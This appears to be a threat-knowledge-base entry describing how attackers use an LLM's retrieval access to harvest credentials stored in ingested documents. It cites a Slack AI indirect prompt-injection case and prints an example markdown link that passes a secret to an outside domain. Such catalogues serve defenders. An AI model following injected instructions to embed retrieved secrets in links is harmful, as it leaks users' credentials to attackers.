RAG Credential Harvesting
Type: technique
Description: Adversaries may attempt to use their access to a large language model (LLM) on the victim's system to collect credentials. Credentials may be stored in internal documents which can inadvertently be ingested into a RAG database, where they can ultimately be retrieved by an AI agent.
Version: 0.1.0
Created At: 2025-10-01 13:13:22 -0400
Last Modified At: 2025-10-01 13:13:22 -0400
External References
Related Objects
- --> Unsecured Credentials (technique): Sub-technique of
- --> RAG Data Harvesting (technique): The two techniques are similar apart from their target data and purpose.
- <-- RAG Data Harvesting (technique): The two techniques are similar apart from their target data and purpose.
- <-- Data Exfiltration from Slack AI via indirect prompt injection (procedure): Once a user asks a question about "EldritchNexus API key", SlackAI has access to information in their private channels. The adversary gets SlackAI to embed any found secret in a clickable link parameter
[click here to reauthenticate](https://aiexecutiveorder.com?secret=confetti)
.